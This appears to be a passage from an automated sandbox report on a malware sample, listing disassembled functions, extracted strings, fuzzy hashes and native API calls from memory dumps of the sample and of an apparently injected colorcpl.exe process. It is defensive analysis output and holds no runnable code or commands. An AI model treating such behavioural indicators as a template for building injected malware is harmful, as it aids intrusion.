Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: 5$E$P$Q$S$p$z
API String ID: 0-3160930913
Opcode ID: 909bf1ca9c5ed29cc678ffba058be63360535bee55ab856c43c7ee92cc0665c1
Instruction ID: f4cf0d9478ad0157fd9baa4d35fa144c4d8f78894b6253e433beb28a0b2ddefc
Opcode Fuzzy Hash: 909bf1ca9c5ed29cc678ffba058be63360535bee55ab856c43c7ee92cc0665c1
Instruction Fuzzy Hash: 7011DE10D0C7CAD9DB12C7BC84143AEBF715F26225F0882C9D5E46B2D2C2794705CBA6

Function 02CCC721 Relevance: 7.7, Strings: 6, Instructions: 171COMMON

Download Yara Rule

Strings

T, xrefs: 02CCC75E
F, xrefs: 02CCC773
x, xrefs: 02CCC788
f, xrefs: 02CCC781
P, xrefs: 02CCC757
r, xrefs: 02CCC77A

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: 589958f89bf5aebb17f6715e72a039915e43ca1d2bdb5297ef2a9d05c3af6e73
Instruction ID: e4835c565f35f37daf1f39d2b3a7870200fc820cfd1b593326fb4137624e98c9
Opcode Fuzzy Hash: 589958f89bf5aebb17f6715e72a039915e43ca1d2bdb5297ef2a9d05c3af6e73
Instruction Fuzzy Hash: 99511171900305AEDB39DB68CC84BEAB7B9EF44314F10851EE54D66580EBB9A788CF91

Function 02CCBAB1 Relevance: 6.6, Strings: 5, Instructions: 302COMMON

Download Yara Rule

Strings

k, xrefs: 02CCBAEE
@4>J, xrefs: 02CCBB32
, xrefs: 02CCBAE0
e, xrefs: 02CCBAF5
o, xrefs: 02CCBAE7

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: $@4>J$e$k$o
API String ID: 0-1109533214
Opcode ID: d605fc70738ad968026ddd5f8b020264fe063352ea7f2e506d300757c0f6e509
Instruction ID: 783c04e45980c55c691d6364145a3ab78df3add4a22fb0fcb06b21e5a6e0032d
Opcode Fuzzy Hash: d605fc70738ad968026ddd5f8b020264fe063352ea7f2e506d300757c0f6e509
Instruction Fuzzy Hash: 4EB1F9B5A00708AFDB24DBE4CC85FEFB7B9AF88704F20855CE619A7240D675AE41DB50

Function 02CCC3E9 Relevance: 5.2, Strings: 4, Instructions: 243COMMON

Download Yara Rule

Strings

, xrefs: 02CCC4BD
e, xrefs: 02CCC4D2
h, xrefs: 02CCC4C4
o, xrefs: 02CCC4CB

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: 516aae56c8f079d06972df2a09511d99cfc89643812e932831715a510babc121
Instruction ID: c328f4b5c36720a7ca26eb7471b25248fbfbf9f33d5a3d8aeffe47bc25adee85
Opcode Fuzzy Hash: 516aae56c8f079d06972df2a09511d99cfc89643812e932831715a510babc121
Instruction Fuzzy Hash: 018142B2D11218AAEB25EB90CC85FEE737DEF48700F04419EE60DA6140EB755B84DFA1

Function 02CCB971 Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

TRUE, xrefs: 02CCB9DB, 02CCB9DE
FALSETRUE, xrefs: 02CCB9F1, 02CCB9F6
TRUE, xrefs: 02CCBA6E
FALSETRUE, xrefs: 02CCBA19, 02CCBA1C

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 90ea9c6c7946d4794eada6121a83a94776ad46bf349c03f8686f17b9272f2676
Instruction ID: fde6374d130df4b1e4958b2bc9779b731b033520e4e17f02401939ee1d0e632b
Opcode Fuzzy Hash: 90ea9c6c7946d4794eada6121a83a94776ad46bf349c03f8686f17b9272f2676
Instruction Fuzzy Hash: 3D412EB29512187EEB02EB94CC42FFF777DDFA5700F004049FA05BA180E774AA558BA6

Function 02CCC3F1 Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

, xrefs: 02CCC4BD
e, xrefs: 02CCC4D2
h, xrefs: 02CCC4C4
o, xrefs: 02CCC4CB

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: 030ba9c3c7a786a1ce024707a0c763681700ff760789dade90d677ca87146976
Instruction ID: 6768f8dd5cde37e9606d947efad4de6001f865bd4ef6b86d092a4266864fa6f4
Opcode Fuzzy Hash: 030ba9c3c7a786a1ce024707a0c763681700ff760789dade90d677ca87146976
Instruction Fuzzy Hash: B9413271D11218AADB54EBA4CC41FEEB3B9EF48700F0081DDE50DA6140EB756B849FE5

Function 02CC7C71 Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

O, xrefs: 02CC7D47
E, xrefs: 02CC7D39
6, xrefs: 02CC7D40
K, xrefs: 02CC7D4E

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: 6$E$K$O
API String ID: 0-518338784
Opcode ID: 38391ea09796ab4a56faf1314aeeb8b0ad92b505319a4224473c2397a1e10c4d
Instruction ID: a540ae502f8779a60ea5ac73f504f88e58d7bb8f1ccaa1a3d3221648b655b095
Opcode Fuzzy Hash: 38391ea09796ab4a56faf1314aeeb8b0ad92b505319a4224473c2397a1e10c4d
Instruction Fuzzy Hash: 64313471D101097BEB10DFA4CD41BFF77B9EF08304F404159E908A6240E776AB458BE5

Function 02CB5501 Relevance: 5.0, Strings: 4, Instructions: 23COMMON

Download Yara Rule

Strings

I, xrefs: 02CB5527
r8tyg|, xrefs: 02CB5532, 02CB553B
r8ty, xrefs: 02CB5517
g|, xrefs: 02CB551E

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: I$g|$r8ty$r8tyg|
API String ID: 0-745488224
Opcode ID: f2ec19e73ae3643ce71873b1a0c3b6d565fa315b85ecc899d9f2fd1911051c5c
Instruction ID: 257fc70932657e5d405fec034679f5622fd2b263e09829f7f65298c69a31f10f
Opcode Fuzzy Hash: f2ec19e73ae3643ce71873b1a0c3b6d565fa315b85ecc899d9f2fd1911051c5c
Instruction Fuzzy Hash: 86E092B080024C6ADB00EFE4DC41AEEBB38EF00244F609999C9549B251E371C604CB9A

Analysis Process: colorcpl.exePID: 7104, Parent PID: 1268COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	2.2%
Total number of Nodes:	453
Total number of Limit Nodes:	77

Executed Functions

Function 03049DC0 Relevance: 21.5, Strings: 17, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lt, xrefs: 03049F6F
v, xrefs: 03049E38
z4, xrefs: 03049F17
K5, xrefs: 03049F02
5z4, xrefs: 0304A14F
}, xrefs: 03049FD1
^[, xrefs: 03049F4A
XW, xrefs: 03049F8D
z, xrefs: 03049E46
0, xrefs: 03049E83
D, xrefs: 03049E3F
?, xrefs: 03049FBD
w, xrefs: 03049E0C
', xrefs: 03049F9E
Mu, xrefs: 03049ED0
/, xrefs: 03049E8D
^, xrefs: 03049E79

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID:
String ID: /$0$?$D$K5$Lt$Mu$XW$^$^[$v$z$z4$}$'$5z4$w
API String ID: 0-2045270831
Opcode ID: c70a0e215ec328487263dbe3c660c9752e7ae6f5925262c19b7f9f50db9c8f01
Instruction ID: 2dd88391a6151c35f607545b87df578c1ba50bb87ea7eeaf36033acc30a4bbbd
Opcode Fuzzy Hash: c70a0e215ec328487263dbe3c660c9752e7ae6f5925262c19b7f9f50db9c8f01
Instruction Fuzzy Hash: 44F1BFB0E46229CFDB24CF99C9947EDBBB1BF44308F2085A9D4097B281D7756A85CF44

Function 0305C3B0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0305C494
FindNextFileW.KERNELBASE(?,00000010), ref: 0305C4CF
FindClose.KERNELBASE(?), ref: 0305C4DA

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 0c02a8ca265d129e42cc71690012151faf97ecebfd056058fb98977b22bd933c
Instruction ID: 760011e948476c9e7c66e0bf9034d849d555b2925b6ba6c480e94bfb46484d8e
Opcode Fuzzy Hash: 0c02a8ca265d129e42cc71690012151faf97ecebfd056058fb98977b22bd933c
Instruction Fuzzy Hash: 6E31A8B59013087BEB60EF60DC85FFF77BCDF84705F144458B909AB180DAB4AA848BA1

Function 03068EC0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03068FBE

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
Instruction ID: 8f9cb47dbb9c44e394055c619b6037e13701543a5442d315e893ae276ca35e08
Opcode Fuzzy Hash: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
Instruction Fuzzy Hash: 9231E3B5A01248AFDB14DF98D881EEEB7F9EF8C304F108119F919AB344D774A851CBA4

Function 03069030 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03069116

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
Instruction ID: 45312f931aa9eb68bcfb30f60fa9d5403f8a9e03180b9c2e7433629c12ceeae0
Opcode Fuzzy Hash: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
Instruction Fuzzy Hash: 1A31E7B5A00248AFDB14DF98D841EDFB7F9EF88314F108119F919AB244D774A911CFA5

Function 03069320 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(03051B8E,?,03067E0E,00000000,00000004,00003000,?,?,?,?,?,03067E0E,03051B8E), ref: 030693EB

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 791fe5aee6c4ccce90167758e625808fa971abe00af37c983824597c540c284e
Instruction ID: c1c9d7fc38fd8be152dad60716635f1828d517412b639d99c0263208e2755fb4
Opcode Fuzzy Hash: 791fe5aee6c4ccce90167758e625808fa971abe00af37c983824597c540c284e
Instruction Fuzzy Hash: 532125B5A00309AFDB10DF98DC41EEFB7B9EFC8304F008109F918AB244D674A911CBA5

Function 03069120 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 030691B6

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 876a2cd22cab806990b3ef133206fa3bee5b983be8e20418055e3e13876e6c4c
Instruction ID: 08505ca3107d1f7a02cff7b44f6d82a4fcb598629b1aa033392f2e582654a5c4
Opcode Fuzzy Hash: 876a2cd22cab806990b3ef133206fa3bee5b983be8e20418055e3e13876e6c4c
Instruction Fuzzy Hash: 4A119EB5A013087FD620EB68DC41FEBB7ACDFC5614F00850AF918AB284D7757615CBA1

Function 030691C0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030691F4

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction ID: 9d19fab9a06b8c225dd73f9e5b798f8ca7bc8f328964f4ae0f0da8a49296d293
Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction Fuzzy Hash: B6E08CBA2012047BD620FA5AEC01FEB7BACDFC5764F008025FA08AB285C675B91087F5

Function 052A4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A465A

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 807cb6a3086fac8c72289c2b2cc12ba4947f91ef9809e73a2e105d5c0bbd48ec
Instruction ID: 36bddc843da9317f1f402e0d3ece135b2044a575e3e8b13fcf4a27ca5ac898c4
Opcode Fuzzy Hash: 807cb6a3086fac8c72289c2b2cc12ba4947f91ef9809e73a2e105d5c0bbd48ec
Instruction Fuzzy Hash: 159002A261150042514071584C4444660199BE13413D5C115A1595560C869889559669

Function 052A4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A434A

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 931e9db2f8985ed7981f34b8333ace9320631ec0f20d59285ab1c6e5a5bbb53d
Instruction ID: 0b165b6b3225b1d63521eed75ebd3f14b2148c1e783472d06265baea15d663f7
Opcode Fuzzy Hash: 931e9db2f8985ed7981f34b8333ace9320631ec0f20d59285ab1c6e5a5bbb53d
Instruction Fuzzy Hash: D290027261580012A14071584CC458640199BE0341B95C011E1465554C8A948A565761

Function 052A2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2D3A

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4373035f99e93ed8bc064211116951c3244d6912030b9bd881ae84780b398d3
Instruction ID: ec118e819e3708e92fb45d1f719a6f3fb22d71639022bad39c9c58bd94a1079f
Opcode Fuzzy Hash: b4373035f99e93ed8bc064211116951c3244d6912030b9bd881ae84780b398d3
Instruction Fuzzy Hash: 2D90026231140003E140715858586464019DBE1341F95D011E1455554CD99589565622

Function 052A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2D1A

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbd29e801978bab90df877f62f7c1d2968f394ee6280ae9ce228951cf2c1e0e9
Instruction ID: e512b5d15af23790e48e36bb225fadcd2b1c80fdc64d8d50181ec652affdce20
Opcode Fuzzy Hash: cbd29e801978bab90df877f62f7c1d2968f394ee6280ae9ce228951cf2c1e0e9
Instruction Fuzzy Hash: D190026A22340002E1807158584864A00198BD1342FD5D415A1056558CC99589695721

Function 052A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2DFA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a12b58e11580c8a8d79709448b1f067c9c5886db17b2d121a457bef35a800ebd
Instruction ID: b17b866a9b2d358384226a793048046eae30c44e4b6a695ea9344cf676154c32
Opcode Fuzzy Hash: a12b58e11580c8a8d79709448b1f067c9c5886db17b2d121a457bef35a800ebd
Instruction Fuzzy Hash: 3B90027221140413E11171584944747001D8BD0381FD5C412A1465558D96D68A52A521

Function 052A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2DDA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c9771faf5bd047add5313f89f434b5ee22a052a41a989bbaab2a03845928ff6
Instruction ID: 4465cb5532b808ef66234e00a4f08de206d7b1f2e72054502a73aadf0546b99f
Opcode Fuzzy Hash: 2c9771faf5bd047add5313f89f434b5ee22a052a41a989bbaab2a03845928ff6
Instruction Fuzzy Hash: 74900262252441526545B1584844547401A9BE03817D5C012A2455950C85A69956DA21

Function 052A2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2C6A

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 414a1838f880b0cd269e751f1e3f1f4f52504018c5c16464664c440738a1f09f
Instruction ID: 3d68173cf658dee47ff9c98274bca8fc5fd0121424d50b53924517f8fcf81462
Opcode Fuzzy Hash: 414a1838f880b0cd269e751f1e3f1f4f52504018c5c16464664c440738a1f09f
Instruction Fuzzy Hash: 0A90027221140842E10071584844B8600198BE0341F95C016A1165654D8695C9517921

Function 052A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2C7A

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dd113689a7bac2c95399399edad7d6baade294a67845079c006db008e822f8ec
Instruction ID: 22eceddf668759689d2491118442fa20ac2342cb4099abfb1a9ad4c5e8ba7096
Opcode Fuzzy Hash: dd113689a7bac2c95399399edad7d6baade294a67845079c006db008e822f8ec
Instruction Fuzzy Hash: 9F90027221148802E1107158884478A00198BD0341F99C411A5465658D86D589917521

Function 052A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2CAA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b3cd87e421f70988286d98b0c9de32386def4eb3820eddb5a6a1488e300430ae
Instruction ID: 1d29d6f75f423e57ff95f7f1a0e4dabe95e8822c2bf5cc265c37e87df918e254
Opcode Fuzzy Hash: b3cd87e421f70988286d98b0c9de32386def4eb3820eddb5a6a1488e300430ae
Instruction Fuzzy Hash: BF90027221140402E1007598584868600198BE0341F95D011A6065555EC6E589916531

Function 052A2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2F3A

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a0170455029d309408bd843f43dda32f753d28788b85681c7e86ea3c1988b41
Instruction ID: faed344fb9c937c8e37934255b6507649f9eea3da63a1050977524822f44303b
Opcode Fuzzy Hash: 5a0170455029d309408bd843f43dda32f753d28788b85681c7e86ea3c1988b41
Instruction Fuzzy Hash: C69002A235140442E10071584854B460019CBE1341F95C015E20A5554D8699CD526526

Function 052A2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2FBA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46e3eb200f05924c5e5f7159942dda2ab90e2b2ee242949ef677bb31e83e0bee
Instruction ID: 71ac0ee2806e66f53099f1e57cc737caea85aaf597612f1106047b52d128dc25
Opcode Fuzzy Hash: 46e3eb200f05924c5e5f7159942dda2ab90e2b2ee242949ef677bb31e83e0bee
Instruction Fuzzy Hash: C390026261140042514071688C849464019AFE1351795C121A19D9550D85D989655A65

Function 052A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2FEA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36f7c35a4bfb11f5f197e685173fe64b6a79f3cd512a3e1a49433ff0f345796f
Instruction ID: a56271b1b67f2e192e9372bf95d2059cf5b4619287957d3ba67709afb43e9494
Opcode Fuzzy Hash: 36f7c35a4bfb11f5f197e685173fe64b6a79f3cd512a3e1a49433ff0f345796f
Instruction Fuzzy Hash: 55900262221C0042E20075684C54B4700198BD0343F95C115A1195554CC99589615921

Function 052A2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2E8A

Memory Dump Source

